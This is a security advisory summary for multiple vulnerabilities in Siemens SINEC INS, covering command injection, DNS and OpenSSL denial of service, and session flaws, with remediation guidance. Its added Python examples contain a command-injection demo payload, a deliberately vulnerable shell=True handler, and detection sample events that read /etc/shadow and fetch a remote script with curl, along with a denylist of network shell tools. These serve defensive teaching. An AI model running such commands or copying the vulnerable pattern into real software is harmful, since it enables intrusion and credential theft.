Full Report
SINEC INS before V1.0 SP2 Update 3 is affected by multiple vulnerabilities. Siemens has released a new version of SINEC INS and recommends updating to the latest version.
Analysis Summary
# Vulnerability: Multiple Vulnerabilities in SINEC INS
## CVE Details
The advisory covers several vulnerabilities; the most relevant identifiers include:
- **CVE-2024-46890**: CVSS 9.4 (Critical) - CWE-78 (OS Command Injection) in the web management interface
- **CVE-2023-50387**: CVSS 7.5 (High) - CWE-674 (Uncontrolled Recursion), the "KeyTrap" DNSSEC validation DoS in the integrated BIND resolver
- **CVE-2023-5679 / CVE-2023-5680**: CVSS 7.5 (High) - CWE-617 (Reachable Assertion), BIND assertion failures
- **CVE-2024-46894**: CVSS 6.3 (Medium) - CWE-200 (Exposure of Sensitive Information), improper authorization on the SFTP user API
- **CVE-2024-46891**: CVSS 5.3 (Medium) - CWE-400 (Uncontrolled Resource Consumption)
- **CVE-2023-5678**: CVSS 5.3 (Medium) - CWE-754 (Improper Check for Unusual or Exceptional Conditions), OpenSSL Diffie-Hellman DoS
- **CVE-2024-46892**: CVSS 4.9 (Medium) - CWE-613 (Insufficient Session Expiration)
## Affected Systems
- **Products**: SINEC INS (Infrastructure Network Services)
- **Versions**: All versions prior to V1.0 SP2 Update 3
- **Affected components**: the integrated BIND (DNS) server, the bundled OpenSSL library, and the web-based management interface and its API.
## Vulnerability Description
SINEC INS is affected by multiple flaws originating from both its own management API and integrated third-party components (OpenSSL and BIND):
1. **OS Command Injection (CVE-2024-46890)**: Input sent to specific web interface endpoints is not properly validated, so a user who already holds high privileges can inject arbitrary operating system commands.
2. **DNS Vulnerabilities**: "KeyTrap" (CVE-2023-50387), where specially crafted DNSSEC responses drive the validating resolver into extreme CPU consumption, and assertion failures in BIND (CVE-2023-5679 / CVE-2023-5680), including the case where DNS64 and "serve-stale" are enabled together.
3. **Cryptographic DoS**: OpenSSL flaws triggered by excessively long Diffie-Hellman keys or parameters (CVE-2023-5678) and by internal state corruption on PowerPC builds.
4. **Authorization/Session Issues**: Sessions are not invalidated when a user is disabled (CVE-2024-46892), and access control on the SFTP user API is insufficient (CVE-2024-46894).
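Item 1 above describes the bug class rather than the concrete endpoint, so the following is an added illustration written for this page, not code from SINEC INS or from Siemens. It assumes a hypothetical "network diagnostic" endpoint that takes a target host from an administrative user; `echo` stands in for the real diagnostic binary so the example runs anywhere. The vulnerable handler splices the value into a shell command line; the hardened one allowlists the value and passes it as a single argv element with `shell=False`.

```python
import ipaddress
import re
import subprocess

# RFC 1123 label: letters, digits and hyphen, 1-63 chars, no leading/trailing hyphen.
_LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
HOSTNAME_RE = re.compile(rf"^(?:{_LABEL}\.)*{_LABEL}\.?$")


def validate_target(target: str) -> str:
    """Return the target if it is a hostname or IP literal, otherwise raise.

    A leading '-' can never pass, so the value also cannot be mistaken for an
    option by the tool it is later handed to (argument injection)."""
    if not target or len(target) > 253:
        raise ValueError("target missing or too long")
    try:
        return str(ipaddress.ip_address(target))
    except ValueError:
        pass
    if HOSTNAME_RE.fullmatch(target):
        return target
    raise ValueError(f"invalid target: {target!r}")


def run_diag_vulnerable(target: str) -> str:
    """CWE-78 pattern: user input spliced into a command string run by /bin/sh.

    The shell parses ';', '|', '$(...)' and friends inside `target`, so a
    privileged user of the hypothetical endpoint gets arbitrary command execution."""
    cmd = f"echo diag {target}"
    result = subprocess.run(cmd, shell=True, capture_output=True, text=True, check=False)
    return result.stdout


def run_diag_hardened(target: str) -> str:
    """Allowlist-validate, then pass argv as a list with shell=False so the
    target reaches the tool as exactly one argument and is never shell-parsed."""
    safe = validate_target(target)
    result = subprocess.run(["echo", "diag", safe], shell=False,
                            capture_output=True, text=True, check=False)
    return result.stdout


if __name__ == "__main__":
    payload = "127.0.0.1; echo INJECTED"
    print(run_diag_vulnerable(payload), end="")   # second output line proves the injected command ran
    try:
        run_diag_hardened(payload)
    except ValueError as exc:
        print("hardened handler rejected input:", exc)
    print(run_diag_hardened("10.0.0.1"), end="")
```

Note that `shell=False` alone is not sufficient: without the allowlist, a value such as `-h` would still be interpreted as an option by the diagnostic tool, which is why the validator rejects anything that is not a hostname or IP literal.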
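Item 4 (CVE-2024-46892) is a design flaw rather than a parsing bug: the session check trusts the token and never looks at the account again. The in-memory session store below is an added example written for this page, not SINEC INS code; the user, session and field names are assumptions. It contrasts the vulnerable check (any unexpired token is accepted) with a hardened one that re-validates the account on every request and ties each token to an "authorization generation" that is bumped whenever the account is disabled or its role changes, and it shows eager revocation at disable time as the primary fix.

```python
import secrets
import time
from dataclasses import dataclass
from typing import Dict, Optional


@dataclass
class User:
    name: str
    role: str
    enabled: bool = True
    auth_generation: int = 0   # bumped on disable, role change or password reset


@dataclass
class Session:
    user: str
    issued_generation: int     # User.auth_generation at login time
    expires_at: float


class SessionStore:
    """Constructed stand-in for an application's user and session tables."""

    def __init__(self) -> None:
        self.users: Dict[str, User] = {}
        self.sessions: Dict[str, Session] = {}

    def add_user(self, name: str, role: str) -> None:
        self.users[name] = User(name, role)

    def login(self, name: str, ttl: float = 3600.0) -> str:
        user = self.users[name]
        if not user.enabled:
            raise PermissionError("account disabled")
        token = secrets.token_urlsafe(32)
        self.sessions[token] = Session(name, user.auth_generation, time.time() + ttl)
        return token

    # --- account administration ---------------------------------------------
    def disable_user_vulnerable(self, name: str) -> None:
        """Flip the flag only; tokens already issued keep working (CWE-613)."""
        self.users[name].enabled = False

    def disable_user_hardened(self, name: str) -> int:
        """Flip the flag, bump the generation and revoke live sessions eagerly."""
        user = self.users[name]
        user.enabled = False
        user.auth_generation += 1
        return self.revoke_sessions_for(name)

    def change_role(self, name: str, role: str) -> int:
        """A permission change must also force re-authentication."""
        user = self.users[name]
        user.role = role
        user.auth_generation += 1
        return self.revoke_sessions_for(name)

    def revoke_sessions_for(self, name: str) -> int:
        stale = [t for t, s in self.sessions.items() if s.user == name]
        for t in stale:
            del self.sessions[t]
        return len(stale)

    # --- per-request authorization ------------------------------------------
    def authorize_vulnerable(self, token: str) -> Optional[User]:
        """Accept any unexpired token without re-checking the account state."""
        s = self.sessions.get(token)
        if s is None or s.expires_at <= time.time():
            return None
        return self.users.get(s.user)

    def authorize_hardened(self, token: str) -> Optional[User]:
        """Re-validate on every request: drop the token if the account is gone,
        disabled, or its generation moved on since the token was issued."""
        s = self.sessions.get(token)
        if s is None or s.expires_at <= time.time():
            return None
        user = self.users.get(s.user)
        if user is None or not user.enabled or s.issued_generation != user.auth_generation:
            self.sessions.pop(token, None)
            return None
        return user


if __name__ == "__main__":
    store = SessionStore()
    store.add_user("operator", "admin")
    tok = store.login("operator")
    store.disable_user_vulnerable("operator")
    print("vulnerable check still accepts token:", store.authorize_vulnerable(tok) is not None)
    print("hardened check accepts token:", store.authorize_hardened(tok) is not None)
```

The per-request check is deliberately kept even though `disable_user_hardened` already revokes sessions: in a clustered deployment or with a cache in front of the session table, eager revocation can lag, and the generation comparison closes that window.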
## Exploitation
- **Status**: Proof-of-concept code is reported for several CVEs (e.g., CVE-2023-5678, CVE-2024-46891, CVE-2024-46892, CVE-2024-46894). No exploitation in the wild has been confirmed by the vendor at the time of writing.
- **Complexity**: Low for the denial-of-service issues in BIND and OpenSSL; the OS command injection requires an already high-privileged account on the web interface.
- **Attack Vector**: Network (most vulnerabilities are reachable remotely over the exposed service ports: DNS, the web management interface and SFTP).
## Impact
- **Confidentiality**: High (due to OS command injection and API authorization bypass).
- **Integrity**: High (command injection allows full system modification).
- **Availability**: High (multiple Denial of Service vectors in DNS and OpenSSL).
## Remediation
### Patches
Siemens recommends updating to the following version:
- **SINEC INS V1.0 SP2 Update 3** or later.
### Workarounds
- Limit access to the web management interface to trusted administrative networks only, and keep the set of high-privileged accounts minimal and audited, since the OS command injection (CVE-2024-46890) requires one.
- Disable services that are not needed for operations (e.g., SFTP or DNS) to remove the corresponding attack surface.
## Detection
- **Indicators of Compromise**: Shells, download tools (`curl`, `wget`) or other unexpected binaries spawned by the web application's service account; DNS queries that take abnormally long to resolve, or a `named` process that repeatedly crashes and restarts (assertion failures).
- **Detection Methods**: Use a network IDS to flag DNSSEC responses carrying unusually many keys or signatures (the "KeyTrap" pattern) and TLS handshakes that present oversized Diffie-Hellman parameters; on the host, alert on process creation under the web service account.
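The first indicator above ("unusual OS-level commands executed by the web server user") as a concrete host-side rule, added here as an example and not taken from Siemens or from any SINEC INS log format. The events are constructed JSON lines; the service account name (`www-data`), the parent process name (`gunicorn`) and the field names are assumptions that must be mapped onto whatever process telemetry (auditd, EDR, syslog) is actually available from the appliance. The rule flags a shell launched by the service account whose command line contains chaining or substitution characters, and any child binary from a short denylist.

```python
import json
import re
from typing import Dict, List

# Constructed sample events (JSON lines); NOT real SINEC INS output.
SAMPLE_EVENTS = """\
{"ts": "2024-11-12T09:01:02Z", "user": "www-data", "parent": "gunicorn", "comm": "python3", "cmdline": "python3 -m app.worker"}
{"ts": "2024-11-12T09:01:05Z", "user": "www-data", "parent": "gunicorn", "comm": "sh", "cmdline": "sh -c ping -c 1 10.0.0.7"}
{"ts": "2024-11-12T09:01:06Z", "user": "www-data", "parent": "gunicorn", "comm": "sh", "cmdline": "sh -c ping -c 1 10.0.0.7; id; cat /etc/shadow"}
{"ts": "2024-11-12T09:01:09Z", "user": "www-data", "parent": "sh", "comm": "curl", "cmdline": "curl -s http://198.51.100.23/x.sh"}
{"ts": "2024-11-12T09:02:00Z", "user": "root", "parent": "systemd", "comm": "named", "cmdline": "/usr/sbin/named -u bind"}
"""

WEB_SERVICE_ACCOUNTS = {"www-data"}                       # assumption: the web app's service account
SHELLS = {"sh", "bash", "dash", "ash"}
# Binaries the web service account has no business launching; extend per environment.
UNEXPECTED_CHILDREN = {"curl", "wget", "nc", "ncat", "base64", "chmod", "perl", "socat"}
# Command chaining, pipes, backticks, $(...) substitution, or redirects into absolute paths.
METACHARS = re.compile(r"[;|&`]|\$\(|>\s*/")


def classify(event: Dict[str, str]) -> List[str]:
    """Return the reasons one event is suspicious (empty list if it is not)."""
    reasons: List[str] = []
    if event.get("user") not in WEB_SERVICE_ACCOUNTS:
        return reasons
    comm, cmdline = event.get("comm", ""), event.get("cmdline", "")
    if comm in SHELLS and METACHARS.search(cmdline):
        reasons.append("shell spawned by web service account with command chaining")
    if comm in UNEXPECTED_CHILDREN:
        reasons.append(f"unexpected child binary '{comm}' under web service account")
    return reasons


def detect(jsonl: str) -> List[Dict[str, object]]:
    """Run classify() over JSON-lines input and collect the flagged events."""
    hits: List[Dict[str, object]] = []
    for line in jsonl.splitlines():
        if not line.strip():
            continue
        event = json.loads(line)
        reasons = classify(event)
        if reasons:
            hits.append({"ts": event["ts"], "cmdline": event["cmdline"], "reasons": reasons})
    return hits


if __name__ == "__main__":
    for hit in detect(SAMPLE_EVENTS):
        print(hit["ts"], hit["cmdline"], "->", "; ".join(hit["reasons"]))
```

The second sample event (a plain `sh -c ping ...`) is intentionally not flagged: an application that shells out for diagnostics produces such events as baseline, and the rule keys on the chaining characters that an injected payload needs rather than on the shell itself. Baseline that legitimate pattern first, then tighten the rule to "any shell under the service account" if the application is known never to do that.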
## References
- Siemens Security Advisory SSA-915275: hxxps://cert-portal[.]siemens[.]com/productcert/pdf/ssa-915275[.]pdf
- Siemens ProductCERT: hxxps://www[.]siemens[.]com/cert/advisories
- Terms of Use: hxxps://www[.]siemens[.]com/productcert/terms-of-use